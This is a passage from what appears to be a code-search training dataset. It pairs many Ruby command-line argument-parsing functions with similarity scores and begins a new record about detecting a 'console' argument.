"def parse_args\n args_map = {:main => $0}\n ARGV.each { |arg|\n sep = arg.index('=')\n\n key = arg[0..sep-1].to_sym\n val = arg[sep+1..-1]\n\n if val == 'true'\n val = true\n end\n if val == 'false'\n val = false\n end\n args_map[key] = val\n }\n return args_map\n end",
"def parse_catchall\n bail_args(@argv.join(' ')) if(@argv.length != 0)\n end",
"def checkCommandLine\r\n if ARGV.length != 2\r\n puts \"\\nUsage: sum <fileName> <numThreads>\\n\\n\"\r\n exit(1)\r\n end\r\nend",
"def run\n\n if parsed_options? && arguments_valid? \n process_arguments \n process_command\n else\n output_usage\n end\n\n end",
"def parse!( args )\n @args = args\n @options.grep!(args)\n end",
"def extract_arguments!\n return ARGV[0], nil, nil if ARGV.length == 1\n\n raise(ArgumentError, \"Usage: mixtape-bu SOURCE [CHANGES] [DEST]\") unless ARGV.length == 3\n\n ARGV.take(3)\nend",
"def handle_arguments(arg_list)\n @args = []\n\n arg_list.each do |arg|\n case arg\n when /^--(backtrace|traceback)$/ then\n @backtrace = true\n when /^--bench(mark)?$/ then\n @benchmark = true\n when /^--debug$/ then\n $DEBUG = true\n else\n @args << arg\n end\n end\n end",
"def check_command_line\n if (!ARGV[0].nil? && ARGV[0].downcase == \"test\")\n @test = true\n elsif(ARGV.length < 2)\n puts \"USAGE: ruby main.rb <users_csv_file> <businesses_csv_file>\"\n puts \"OR\"\n puts \"USAGE: ruby main.rb test\"\n exit 1\n end\nend",
"def args\n options = {}\n options[:type] = ARGV[0]\n options[:url] = ARGV[1]\n\n if (ARGV[2].include? \"--custom-auth\") # [--custom-auth | --common-words | --vectors | --sensitive | --random | --slow]\n options[:auth] = 'dvwa'\n elsif (ARGV[2].include? \"--common-words\")\n @words = true\n arg = ARGV[2].split(\"=\")\n options[:words] = arg[1]\n end\n\n if (ARGV[3])\n arg = ARGV[3].split(\"=\")\n if (ARGV[3].include? \"--common-words\")\n @words = true\n options[:words] = arg[1]\n elsif (ARGV[3].include? \"--vectors\")\n @vectors = true\n options[:vectors] = arg[1]\n end\n end\n\n if (ARGV[4])\n arg = ARGV[4].split(\"=\")\n if (ARGV[4].include? \"--vectors\")\n @vectors = true\n options[:vectors] = arg[1]\n elsif (ARGV[4].include? \"--sensitive\")\n @sensitive = true\n options[:sensitive] = arg[1]\n end\n end\n\n if (ARGV[5])\n arg = ARGV[5].split(\"=\")\n if (ARGV[5].include? \"--sensitive\")\n @sensitive = true\n options[:sensitive] = arg[1]\n elsif (ARGV[5].include? \"--random\")\n if (arg[1] == \"true\")\n @random = true\n end\n options[:random] = arg[1]\n elsif (ARGV[5].include? \"--slow\")\n @slow = true\n options[:slow] = arg[1]\n end\n end\n\n if (ARGV[6])\n arg = ARGV[6].split(\"=\")\n if (ARGV[6].include? \"--random\")\n if (arg[1] == \"true\")\n @random = true\n end\n options[:random] = arg[1]\n elsif (ARGV[6].include? \"--slow\")\n @slow = true\n options[:slow] = arg[1]\n end\n end\n\n if (ARGV[7])\n arg = ARGV[7].split(\"=\")\n if (ARGV[7].include? \"--slow\")\n @slow = true\n options[:slow] = arg[1]\n end\n end\n\n options\nend",
"def parse(args)\n @args = args\n @instruction = args.join(' ')\n until @args.empty?\n arg = @args[0]\n if @instructions.key? arg\n @args.shift\n buff = args_extract(arg, @instructions[arg][0])\n @to_exec << [arg, buff]\n else\n bad_argument_exit(arg)\n end\n end\n run\n end",
"def parse_args\n require 'optimist'\n opts = Optimist.options do\n opt :source, \"Inventory Source UID\", :type => :string, :required => ENV[\"SOURCE_UID\"].nil?, :default => ENV[\"SOURCE_UID\"]\n opt :ingress_api, \"Hostname of the ingress-api route\", :type => :string, :default => ENV[\"INGRESS_API\"] || \"http://localhost:9292\"\n opt :config, \"Configuration file name\", :type => :string, :default => ENV[\"CONFIG\"] || \"default\"\n opt :data, \"Amount & custom values of generated items\", :type => :string, :default => ENV[\"DATA\"] || \"default\"\n end\n\n opts\nend",
"def initialize(given_args=ARGV)\n @options, @arguments, @extras = self.class.parse_options!(given_args)\n end",
"def parse!\n begin\n @opts = OptionParser.new(&method(:set_opts))\n @opts.parse!(@args)\n @options\n rescue Exception => e\n raise e if e.is_a?(SystemExit)\n\n $stderr.puts e.message\n exit 1\n end\n exit 0\n end",
"def run\n if parsed_options? && arguments_valid? \n process_arguments \n process_command\n else\n output_usage\n end\n end",
"def main\n arg_parser=GetoptLong.new\n arg_parser.set_options(\n [\"-e\", \"--exclude\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-i\", \"--include\", GetoptLong::REQUIRED_ARGUMENT],\n [\"-h\", \"--headers\", GetoptLong::NO_ARGUMENT],\n [\"-u\", \"--usage\", GetoptLong::NO_ARGUMENT])\n\n arg_parser.each do |opt, arg|\n begin\n case opt\n when \"-u\"\n usage()\n exit(0);\n when \"-h\"\n printHeader\n when \"-i\"\n $includes.push(arg)\n when \"-e\"\n $excludes.push(arg)\n end\n rescue => err; puts err; break;\n end\n end\n\n # after all args if we still don't have a directory then show usage\n if (ARGV.length != 1)\n usage();\n end\n\n # convert strings to regexs once, rather than during filtering loop\n $excludes.collect! {|str| Regexp.new(str)}\n $includes.collect! {|str| Regexp.new(str)}\n\n processTags(getFiles(ARGV.shift))\n return\nend",
"def parse_args\n options = {}\n optparse = OptionParser.new do|opts|\n # Set a banner\n opts.banner = \"Usage: harness.rb [-c || --config ] FILE [-d || --testdir] DIR\"\n\n options[:testdir] = nil\n opts.on( '-d', '--testdir DIR', 'Execute tests in DIR' ) do|dir|\n options[:testdir] = dir\n end\n options[:config] = nil\n opts.on( '-c', '--config FILE', 'Use configuration FILE' ) do|file|\n options[:config] = file\n end\n\n opts.on( '-h', '--help', 'Display this screen' ) do\n puts opts\n exit\n end\n end\n optparse.parse!\n return options\nend",
"def initialize(args = {})\n parse_args(args)\n end",
"def process_commandline_args\n\n params = { :sidelength => 1, :mult => 10, :stroke_width => 0.7,\n :cols => 10, :rows => 10,\n :nested => 1, :nested_spacing => 0.2,\n :suppress_grid => true,\n :moveto_color => 'none', :lineto_color => '#ff0000', :background_color => '#fe8736',\n :xshift => 0, :yshift => 0,\n :shiftstep => nil, :shiftstepx => 0, :shiftstepy => 0, :shiftsteps => 15,\n :outputstepfile => 'output/img_%.04d.svg'\n }\n\n ARGV.each { |a|\n if v = a.match(/^--side-length=([0-9.]+)$/) then params[:sidelength] = v[1].to_f\n elsif v = a.match(/^--cols=([0-9]+)$/) then params[:cols] = v[1].to_i\n elsif v = a.match(/^--rows=([0-9]+)$/) then params[:rows] = v[1].to_i\n elsif v = a.match(/^--nested=([0-9]+)$/) then params[:nested] = v[1].to_i\n elsif v = a.match(/^--nested-spacing=(0?\\.[0-9]+)$/) then params[:nested_spacing] = v[1].to_f\n elsif v = a.match(/^--suppress-grid(=([01]))?$/) then params[:suppress_grid] = (v[1].nil? || v[2] == \"1\")\n elsif v = a.match(/^--mult=([.0-9e]+)$/) then params[:mult] = v[1].to_f\n elsif v = a.match(/^--stroke-width=([.0-9]+)$/) then params[:stroke_width] = v[1].to_f\n elsif v = a.match(/^--moveto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:moveto_color] = v[1]\n elsif v = a.match(/^--lineto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:lineto_color] = v[1]\n elsif v = a.match(/^--xshift=([-.0-9]+)$/) then params[:xshift] = v[1].to_f\n elsif v = a.match(/^--yshift=([-.0-9]+)$/) then params[:yshift] = v[1].to_f\n\n elsif v = a.match(/^--shiftstep=([-.0-9]+)$/) then params[:shiftstep] = v[1].to_f\n elsif v = a.match(/^--shiftstepx=([-.0-9]+)$/) then params[:shiftstepx] = v[1].to_f\n elsif v = a.match(/^--shiftstepy=([-.0-9]+)$/) then params[:shiftstepy] = v[1].to_f\n elsif v = a.match(/^--shiftsteps=([0-9]+)$/) then params[:shiftsteps] = v[1].to_i\n elsif v = a.match(/^--outputstepfile=['\"]*(.+\\.svg)['\"]*$/)\n then\n if v[1].match(/%[.0-9]*d/)\n params[:outputstepfile] = v[1]\n STDERR.puts \"got outputstepfile == #{params[:outputstepfile]}\"\n end\n else abort \"\\nArborting!!! -- Error: unknown argument #{a}\\n\\n\"\n end\n }\n\n unless params[:shiftstep].nil? \n params[:shiftstepx] = params[:shiftstep]\n params[:shiftstepy] = params[:shiftstep]\n end\n\n params\nend",
"def read_argv_flags argsIn\r\n skipVal = argsIn.length + 1\r\n argsIn.each_with_index do |argIn, ind|\r\n next if skipVal == ind\r\n arg = argIn.downcase()\r\n if arg[0].eql? '-'\r\n symAgr = strip_to_sym(arg)\r\n if @options[symAgr].is_a? String\r\n @options[symAgr] = argsIn[ind + 1]\r\n skipVal = ind + 1\r\n elsif @options[symAgr] == false\r\n @options[symAgr] = true\r\n elsif @options[symAgr].is_a? Array\r\n @options[symAgr] = argsIn[ind + 1]\r\n end\r\n elsif known_file_type arg\r\n @options[:f] << argIn.gsub(/(\\.\\/)|(\\.\\\\)/,'')\r\n end\r\n puts argIn\r\n end\r\n end",
"def read_from_cmdline\n require \"shellwords\"\n\n string = unless ARGV.empty?\n ARGV.join(' ')\n else\n if STDIN.tty?\n STDERR.print(\n %|(offline mode: enter name=value pairs on standard input)\\n|\n )\n end\n array = readlines rescue nil\n if not array.nil?\n array.join(' ').gsub(/\\n/n, '')\n else\n \"\"\n end\n end.gsub(/\\\\=/n, '%3D').gsub(/\\\\&/n, '%26')\n\n words = Shellwords.shellwords(string)\n\n if words.find{|x| /=/n.match(x) }\n words.join('&')\n else\n words.join('+')\n end\n end",
"def run\n if parsed_options? && arguments_valid? \n process_arguments \n process_command\n else\n output_options\n end\n end",
"def parse\n # parse flag arguments\n @oparse.parse!(@argv) rescue(bail_args($!))\n @parsed=true\n\n # the overriding class may implement additional arguments from here\n end",
"def process_command_line_options\r\n begin\r\n defer, found = \"\", false\r\n opts = GetoptLong.new(\r\n [ \"--help\", \"-h\", \"-?\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--load\", \"-l\", GetoptLong::REQUIRED_ARGUMENT ],\r\n [ \"--debug\", \"-d\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--quit\", \"-q\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--words\", \"-w\", GetoptLong::NO_ARGUMENT ])\r\n\r\n # Process the parsed options\r\n opts.each do |opt, arg|\r\n unless found\r\n puts; found = true\r\n end\r\n\r\n case opt\r\n when \"--debug\"\r\n @debug = true\r\n when \"--load\"\r\n defer << \"load\\\"#{arg}\\\" \"\r\n when \"--quit\"\r\n defer << \")quit \"\r\n when \"--words\"\r\n defer << \")words \"\r\n else\r\n fail SilentExit\r\n end\r\n end\r\n\r\n puts if found\r\n rescue Exception => e\r\n puts\r\n puts \"fOOrth available options:\"\r\n puts\r\n puts \"--help -h -? Display this message and exit.\"\r\n puts \"--load -l <filename> Load the specified fOOrth source file.\"\r\n puts \"--debug -d Default to debug ON.\"\r\n puts \"--quit -q Quit after processing the command line.\"\r\n puts \"--words -w List the current vocabulary.\"\r\n puts\r\n raise SilentExit\r\n end\r\n\r\n defer\r\n end",
"def run\n if options_valid? && option_combinations_valid? \n process_arguments \n process_command\n else\n output_usage\n end\n end",
"def parse_arguments\n options = {}\n parser = OptionParser.new do |opts|\n opts.on(\"-d\", \"--dir DIR\", \"absolute or relative path of the directory\") do |arg|\n options[:dir] = arg\n end\n\n opts.on(\"-p\", \"--pattern PATTERN\", \"search pattern - can contain asterisk(*) as wildcard\") do |arg|\n options[:pattern] = arg\n end\n end\n parser.parse!\n [options, parser]\nend",
"def parse_args\n options = {}\n optparse = OptionParser.new do|opts|\n # Set a banner\n opts.banner = \"Usage: harness.rb [options...]\"\n\n options[:tests] = []\n opts.on( '-t', '--tests DIR/FILE', 'Execute tests in DIR or FILE (defaults to \"./tests\")' ) do|dir|\n options[:tests] << dir\n end\n\n options[:type] = 'skip'\n opts.on('--type TYPE', 'Select puppet install type (pe, git, skip) - default \"skip\"') do\n |type|\n unless File.directory?(\"setup/#{type}\") then\n puts \"Sorry, #{type} is not a known setup type!\"\n exit 1\n end\n options[:type] = type\n end\n\n options[:puppet] = 'git://github.com/puppetlabs/puppet.git#HEAD'\n opts.on('-p', '--puppet URI', 'Select puppet git install URI',\n \" #{options[:puppet]}\",\n \" - URI and revision, default HEAD\",\n \" just giving the revision is also supported\"\n ) do |value|\n options[:type] = 'git'\n options[:puppet] = value\n end\n\n options[:facter] = 'git://github.com/puppetlabs/facter.git#HEAD'\n opts.on('-f', '--facter URI', 'Select facter git install URI',\n \" #{options[:facter]}\",\n \" - otherwise, as per the puppet argument\"\n ) do |value|\n options[:type] = 'git'\n options[:facter] = value\n end\n\n options[:config] = nil\n opts.on( '-c', '--config FILE', 'Use configuration FILE' ) do|file|\n options[:config] = file\n end\n\n opts.on( '-d', '--dry-run', \"Just report what would be done on the targets\" ) do |file|\n $dry_run = true\n end\n\n options[:mrpropper] = FALSE\n opts.on( '--mrpropper', 'Clean hosts' ) do\n puts \"Cleaning Hosts of old install\"\n options[:mrpropper] = TRUE\n end\n\n options[:stdout_only] = FALSE\n opts.on('-s', '--stdout-only', 'log output to STDOUT but no files') do\n puts \"Will log to STDOUT, not files...\"\n options[:stdout_only] = TRUE\n end\n\n options[:quiet] = false\n opts.on('-q', '--quiet', 'don\\'t log output to STDOUT') do\n options[:quiet] = true\n end\n\n opts.on( '-h', '--help', 'Display this screen' ) do\n puts opts\n exit\n end\n end\n optparse.parse!\n return options\nend",
"def run \n if parsed_options? && arguments_valid? \n puts \"Start at #{DateTime.now}\"\n process_arguments(@validoptions.args)\n puts \"Finished at #{DateTime.now}\"\n else\n raise BoilerMakerErr.new(\"Could not parse options. An unknown error has ocurred.\")\n exit $!\n end\n end",
"def parse!(argv)\n options = {}\n parser = configure_base!(OptionParser.new)\n parser.parse!(argv, into: options)\n unless options.key?(:input)\n puts 'Missing --input argument, which is required.'\n Advent2019.show_help(parser)\n end\n options\n end",
"def parse_command_line(args)\n all_opts = OptionParser.new do |opts|\n opts.banner = \"Usage: #{PROGRAM_NAME} [OPTIONS] PASSWORD\"\n opts.separator ''\n\n opts.on(\n '-t',\n '--load-timeout [TIMEOUT_SECONDS]',\n Integer,\n 'Timeout in seconds to wait for',\n 'gitlab-rails console to load',\n 'and process the change.',\n \"Defaults to #{DEFAULT_LOAD_TIMEOUT} seconds.\"\n ) do |timeout|\n @options.load_timeout = timeout\n end\n\n opts.on(\n '-v',\n '--verbose',\n 'Print out debug info when processing.'\n ) do\n @options.debug = true\n end\n\n opts.on(\n '-h',\n '--help',\n 'Help Message'\n ) do\n puts opts\n @options.help_requested = true\n end\n end\n\n all_opts.parse!(args)\n\n unless @options.help_requested\n fail('ERROR: You must specify the password to set') if (ARGV.length < 1)\n\n @options.password = ARGV[0]\n fail('ERROR: Password cannot be empty') if @options.password.strip.empty?\n end\n end",
"def args\n Mysh.parse_args(cooked_body)\n end",
"def parse!(argv)\n\t\t$log.debug(\"#{self.class}.#{__method__}('#{argv.join(\" \")}'#{block_given? ? ',&block' : ''})\")\n\t\tif (argv.size == 0)\n\t\t\traise OptionParser::InvalidArgument, \"No arguments specified.\"\n\t\tend\n\n\t\t# @options is used to store recognized command-line args\n\t\t@options = Hash.new\n\t\twhile arg = argv.shift\n\t\t\tcase arg\n\t\t\twhen \"-cmd\"\n\t\t\t\t@command = argv.shift\n\t\t\twhen \"-debug\"\n\t\t\t\t$log.level = Logger::DEBUG\n\t\t\t\t$logerr.level = Logger::DEBUG\n\t\t\twhen \"-opt\"\n\t\t\t\t@options[:dataset] = argv.shift\n\t\t\twhen \"-path\"\n\t\t\t\t@options[:path] = argv.shift\n\t\t\twhen \"-target\"\n\t\t\t\t@options[:target] = argv.shift\n\t\t\twhen \"-log\"\n\t\t\t\tlevel = $log.level\n\t\t\t\tlog_path = argv.shift\n\t\t\t\t$log = Logger.new(log_path)\n\t\t\t\t$log.level = level\n\t\t\t\t$logerr = Logger.new(log_path)\n\t\t\t\t$logerr.level = level\n\t\t\telse\n\t\t\t\targv.unshift(arg)\n\t\t\t\tif block_given?\n\t\t\t\t\tunless (argv = yield(argv))\n\t\t\t\t\t\traise OptionParser::InvalidArgument, \"Unknown argument.\"\n\t\t\t\t\tend\n\t\t\t\telse break\n\t\t\t\tend\n\t\t\tend\t\t\n\t\tend\n\t\traise OptionParser::InvalidArgument, \"No command specified.\" unless @command\n\t\tunless (self.class::COMMANDS.include?(@command) && self.respond_to?(@command))\n\t\t\traise OptionParser::InvalidArgument, \"Unknown command '#{@command}' specified.\"\n\t\tend\n\t\treturn argv\n\tend",
"def run(arguments)\n parse(arguments)\n configure\n execute\n end",
"def consume(*args)\n #puts \"Consuming #{args.inspect} from #{ARGV.inspect}\"\n args.each {|arg| ARGV.delete(arg) }\n# ARGV.options do |opts|\n# opts.on(*args) {}\n# opts.parse!\n# end\n #puts \"ARGV: #{ARGV.inspect}\"\n #@args_backup = @args.clone\nend",
"def parse(argv)\n options = parser.process!(argv)\n validate_options(options)\n Revamp.logger.level = Logger::INFO unless options[:verbose]\n options\n end",
"def getArguments\n\n\t# Parse the arguments\n\ttheArgs = { :clang => false,\n\t\t\t\t:rewrite => false,\n\t\t\t\t:help => false,\n\t\t\t\t:paths => [],\n\t\t\t\t:exclude => [] }\n\n\ttheParser = OptionParser.new do |opts|\n\t\topts.banner = \"Usage:\\n rn-format [--help] [--clang] [--rewrite] [--exclude=PATH] PATH [PATH...]\";\n\t\topts.separator \"\";\n\t\topts.separator \"Reformat any source files within the supplied paths,\";\n\t\topts.separator \"displaying the results to standard output.\";\n\t\topts.separator \"\";\n\t\topts.separator \"Options:\";\n\n\t\topts.on('--clang',\t\t\t\t\t\t'Show raw clang-format output') do\n\t\t\ttheArgs[:clang] = true;\n\t\tend\n\n\t\topts.on('--rewrite',\t\t\t\t\t'Rewrite files in-place') do\n\t\t\ttheArgs[:rewrite] = true;\n\t\tend\n\n\t\topts.on('--exclude=PATH',\t\t\t\t'Exclude a path') do |thePath|\n\t\t\ttheArgs[:exclude] << File.expand_path(thePath);\n\t\tend\n\n\t\topts.on('--help',\t\t\t\t\t\t'Show the help') do\n\t\t\ttheArgs[:help] = true;\n\t\tend\n\tend\n\n\ttheParser.parse!;\n\ttheArgs[:paths] = ARGV;\n\n\n\n\t# Show the help\n\tif (theArgs[:help] || theArgs[:paths].empty?)\n\t\tputs theParser.help();\n\t\texit(false);\n\tend\n\t\n\treturn theArgs;\n\nend",
"def parse_args(args)\n options = OpenStruct.new\n\n options[:html] = false\n options[:directory] = './'\n options[:ext] = '.jpg'\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = 'Usage: main.rb [options]'\n opts.separator ''\n opts.separator 'Options:'\n\n opts.on('-f', '--filename FILE', 'Filename to write') do |f|\n options[:filename] = f\n end\n\n opts.on('-d', '--directory DIRECTORY', 'Image directory to process') do |d|\n options[:directory] = d\n end\n\n opts.on('--html', 'Output HTML instead of CSV') do\n options[:html] = true\n end\n\n opts.on('-h', '--help', 'Help') do\n puts opts\n exit\n end\n end\n\n begin\n opt_parser.parse(args)\n rescue OptionParser::ParseError\n $stderr.print(\"Argument Error: #{$ERROR_INFO}\\n\")\n exit\n end\n\n # set default filename if not supplied\n unless options[:filename]\n ext = options[:html] ? 'html' : 'csv'\n options[:filename] = \"exif_data_#{Time.now.strftime('%s')}.#{ext}\"\n end\n\n options\n end",
"def parse_command_line &block\n data = {}\n\n OptionParser.new do |opts|\n opts.banner = \"Usage: #{File.basename($0)} [options]\"\n\n opts.on(\"-c CONFIG\", \"--conf CONFIG\", \"YAML config file\") do |config|\n data[\"config\"] = config\n end\n\n opts.on(\"-p PARAMS\", \"--params PARAMS\", \"Additional default options - key: value as JSON string, override values from config file\") do |params|\n data[\"params\"] = JSON.parse(params)\n end\n\n # process custom args, if given\n block.call(opts) if block_given?\n\n opts.on_tail('-h', '--help', 'display this help and exit') do\n puts opts\n exit\n# return nil\n end\n\n# begin\n opts.parse(ARGV)\n# rescue OptionParser::InvalidOption\n# # do nothing\n# end\n\n end\n\n @args = data\n end",
"def parse_args(args)\n options = {\n :console => false,\n :tag => nil\n }\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = \"Usage: #{$0} <input filepath> [options]\"\n\n opts.separator \"\"\n opts.separator \"Data options:\"\n\n opts.on(\"-t T\", String, \"Tag\") do |t|\n options[:tag] = t\n end\n opts.separator \"\"\n opts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n puts opts\n exit\n end\n end\n\n opt_parser.parse!(args)\n options\nend",
"def parse(args)\n @options = {}\n @options[:command] = :scan # Default command is to scan for lints\n\n OptionParser.new do |parser|\n parser.banner = \"Usage: #{@application.executable_name} [options] [file1, file2, ...]\"\n\n add_linter_options parser\n add_file_options parser\n add_misc_options parser\n add_info_options parser\n end.parse!(args)\n\n # Any remaining arguments are assumed to be files that should be linted\n @options[:included_paths] = args\n\n @options\n rescue OptionParser::InvalidOption => ex\n raise InvalidCliOptionError,\n \"#{ex.message}\\nRun `#{@application.executable_name} --help` to \" \\\n 'see a list of available options.'\n end",
"def parse_command_line\n prepend_environment_options\n options = options_with_defaults\n\n OptionParser.new do |parser|\n\n parser.on(\"-h\", \"--help\", \"Show help\") do |_help_requested|\n ARGV << 'h' # pass on the request to the command processor\n options.suppress_command_line_validation = true\n end\n\n parser.on('-i', '--input_dir DIR',\n \"Input directory containing source data files, default: '#{DEFAULT_INPUT_DIR}'\") do |v|\n options.input_dir = File.expand_path(v)\n end\n\n parser.on('-o', '--output_dir DIR',\n \"Output directory to which report files will be written, default: '#{DEFAULT_OUTPUT_DIR}'\") do |v|\n options.output_dir = File.expand_path(v)\n end\n\n parser.on('-r', '--receipt_dir DIR',\n \"Directory root from which to find receipt filespecs, default: '#{DEFAULT_RECEIPT_DIR}'\") do |v|\n options.receipt_dir = File.expand_path(v)\n end\n\n parser.on('-s', '--shell', 'Start interactive shell') do |v|\n options.interactive_mode = true\n end\n\n parser.on('-v', '--[no-]verbose', 'Verbose mode') do |v|\n options.verbose_mode = v\n end\n\n parser.on('-y', '--[no-]say', 'Say error messages.') do |v|\n options.say = v\n end\n\n parser.on('', '--[no-]receipts', 'Include report on existing and missing receipts.') do |v|\n options.do_receipts = v\n end\n end.parse!\n\n if options.verbose_mode\n puts \"Run Options:\"\n ap options.to_h\n end\n\n options\n end",
"def run\n if arguments = parse_arguments\n begin\n process(arguments)\n rescue RuntimeError => ex\n Console.puts ex.message, :red\n exit 1\n end\n else\n if show_help?\n show_help(nil, Console.width).each do |line|\n Console.puts line, :cyan\n end\n else\n show_usage(nil, Console.width).each do |line|\n Console.puts line, :yellow\n end\n end\n exit 2\n end\n end",
"def process_arguments\n if @options.config != nil\n if File.exist?(@options.config)\n load_config_file \n @config.each do |k, v|\n @project = v\n\n#need to do \n\n end\n else\n error(\"Config file does not exist\")\n end\n else\n @project = @options.project || \"NA\"\n @sub_dir = @options.sub_dir || \"NA\"\n @outname = @options.outname || @options.sub_dir\n @outdir = @options.outdir || $config[\"outdir\"]\n @bams = @options.bams\n @c_design = @options.c_design || nil\n @queue = @options.queue || $config[\"queue\"]\n @ref = @options.ref || \"hg19\"\n @rg_id = @options.rg_id || $config[\"rg\"][\"rg_id\"]\n @sample = @options.sample || \"NA\"\n\n end\n end",
"def process_argv!\n super\n if raw_script_name =~ /(\\w+)-([\\w\\-]+)/\n self.command = $2\n else\n self.command = rest.shift\n end\n end",
"def validate_arguments()\n usage unless ARGV.count > 0\nend",
"def parse arguments\n begin\n @option_parser.parse! arguments\n rescue StandardError => e\n puts @option_parser\n puts\n puts e.message\n exit(-1)\n end\n\n @options\n end",
"def handle(args, stdin, stdout)\n end",
"def run\n if parsed_options? && arguments_valid? \n puts \"Start at #{DateTime.now}\\n\\n\" if @options.verbose\n output_options if @options.verbose\n process_arguments \n start\n puts \"\\nFinished at #{DateTime.now}\" if @options.verbose\n else\n output_usage\n end \n end",
"def parse_argv(argv)\n # command line\n options = {}\n OptionParser.new do |opts|\n options[:queue_name] = nil\n opts.banner = \"Usage: #{__FILE__} [options]\"\n\n opts.on('-c', '--config CONFIG_FILE', 'config file') do |c|\n options[:file_name] = c\n end\n opts.on('-q', '--queue QUEUE', 'queue to be consumed') do |q|\n options[:queue_name] = q\n end\n end.parse!\n @options = options\n end",
"def go(argv)\n logger.debug(\"Using args passed in: #{argv.inspect}\")\n\n cmd = nil\n\n @optparse = OptionParser.new do |opts|\n cmd = super(argv, opts, @config)\n\n opts.on('-v', '--version', 'Print the version') do\n puts \"#{name} #{version}\"\n abort\n end\n end\n\n @optparse.parse!(argv)\n\n logger.debug(\"Parsed config: #{@config.inspect}\")\n\n cmd.execute(argv, @config)\n end",
"def run(*args); end",
"def run(*args); end",
"def run(*args); end",
"def run(*args); end",
"def run(*args); end"
] |
[
"0.74129695",
"0.70760596",
"0.7033612",
"0.70210594",
"0.69626695",
"0.69026005",
"0.68571657",
"0.68488073",
"0.68344635",
"0.6767632",
"0.6656666",
"0.66463333",
"0.66262084",
"0.6620613",
"0.6619896",
"0.66112757",
"0.6601038",
"0.65809566",
"0.6579702",
"0.6564423",
"0.65319717",
"0.65173054",
"0.64691824",
"0.6468377",
"0.64557487",
"0.64531684",
"0.6445904",
"0.6427716",
"0.64206636",
"0.64202595",
"0.63958865",
"0.6395636",
"0.6395636",
"0.6395636",
"0.6387318",
"0.63869804",
"0.6370895",
"0.6358798",
"0.6345734",
"0.6338437",
"0.6336385",
"0.6305482",
"0.629856",
"0.6296537",
"0.6293318",
"0.62837845",
"0.6282528",
"0.6265478",
"0.625408",
"0.62506664",
"0.62411445",
"0.62408555",
"0.6216619",
"0.6211641",
"0.6204412",
"0.61966467",
"0.61790484",
"0.617033",
"0.61620253",
"0.61532253",
"0.61518973",
"0.6145172",
"0.61374784",
"0.6133697",
"0.61208504",
"0.6109143",
"0.6107849",
"0.61035717",
"0.6092726",
"0.60918045",
"0.608872",
"0.6088298",
"0.60844535",
"0.6082135",
"0.60779315",
"0.60669976",
"0.60595894",
"0.60594827",
"0.60590106",
"0.6054021",
"0.60532004",
"0.60512936",
"0.6049252",
"0.6038067",
"0.6030602",
"0.60258526",
"0.60071135",
"0.60060215",
"0.6002058",
"0.5999694",
"0.59963554",
"0.59817076",
"0.59797806",
"0.59643066",
"0.5963496",
"0.59631336",
"0.59616154",
"0.59616154",
"0.59616154",
"0.59616154",
"0.59616154"
] |
0.0
|
-1
|
Check ARGV to see if someone asked for "console"
|
def requesting_console?
@requesting_console
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def commandline\n ui == \"commandline\"\n end",
"def console?\n defined?(::Rails::Console) && $stdout.isatty && $stdin.isatty\n end",
"def validate_argv\n if ARGV.empty? then\n ARGV << \"start\"\n else\n if not %w{start stop restart zap status}.include? ARGV.first then\n $stderr.puts \"ERROR: invalid command '#{ARGV.first}'\"\n $stderr.puts\n $stderr.puts @opt_parser.help()\n exit 1\n end\n end\n end",
"def check_command_line\n if (!ARGV[0].nil? && ARGV[0].downcase == \"test\")\n @test = true\n elsif(ARGV.length < 2)\n puts \"USAGE: ruby main.rb <users_csv_file> <businesses_csv_file>\"\n puts \"OR\"\n puts \"USAGE: ruby main.rb test\"\n exit 1\n end\nend",
"def command_line_info\n puts \"\\nCommand line arguments:\\n\\n\"\n puts \"This program will accept a single command line argument on launch. Arguments can be passed to draughts_app.rb directly or to draughts.sh\\n\"\n puts \"Example: draughts.sh --help\\n\\n\"\n puts \"-h or --help Display all command line arguments\"\n puts \"-i or --info Display instructions on how to play\"\n puts \"-v or --version Display current application and Ruby version\"\n puts \"start Skip menu and immediately start a new game\"\n puts \"wins Print win counts\"\n puts \"\"\nend",
"def valid_argv?\n ARGV[0] && ARGV.all? { |arg| /.+:.+/ =~ arg }\nend",
"def check_usage\n unless ARGV.length == 1\n puts \"Forma de uso: restaura.rb paginaweb\"\n exit\n end\nend",
"def no_script?\n return false unless $ARGV.empty?\n\n print_error(\"You must specify a program to debug\")\n true\n end",
"def check_if_user_gave_input\n\n if ARGV.empty? == true\n puts \" Saisir une recherche après le fichier .rb\"\n abort.google_search\n else ARGV\n\n end\n end",
"def check_required\n # handle case where no files or text were passed (a tty is connected or STDIN is EOF in the latter case)\n return unless @options.files.to_a.empty? && (@stdin.tty? || @stdin.eof?) # to_a.empty? handles nil or empty case\n\n puts 'Either specify input file(s) or pipe text to STDIN'\n show_help\n end",
"def early_option?(args)\n if @options[:version]\n puts(\"boson #{Boson::VERSION}\")\n true\n elsif args.empty? || (@command.nil? && !@options[:execute])\n print_usage\n true\n else\n false\n end\n end",
"def console_output?\n false\n end",
"def checkCommandLine\r\n if ARGV.length != 2\r\n puts \"\\nUsage: sum <fileName> <numThreads>\\n\\n\"\r\n exit(1)\r\n end\r\nend",
"def tty?() end",
"def tty?() end",
"def tty?() end",
"def console=(_arg0); end",
"def console=(_arg0); end",
"def no_options_in_arguments?\n ARGV.grep(/^-/).empty? # Match args that start with - (or --). Those are the options.\n end",
"def gui?\n !ENV.fetch('GUI', '').empty?\nend",
"def tty?\n end",
"def tty?\n end",
"def check_arg()\n if ARGV.length > 1\n print \"ERROR: Too many command line args.\\n\"\n print \"USAGE: #{$PROGRAM_NAME} [--FixThemAll]\\n\"\n exit ERR_EXIT_ARGS2MANY\n end\n if ARGV.length == 1 && ARGV[0] != '--FixThemAll'\n print \"ERROR: Invalid argument on command line: '#{ARGV[0]}'\\n\"\n print \"USAGE: #{$PROGRAM_NAME} [--FixThemAll]\\n\"\n exit ERR_EXIT_ARGINVALID\n end\nend",
"def test_print?\n c = cli\n refute(c.print?)\n\n c = cli(['-p'])\n assert(c.print?)\n end",
"def console; end",
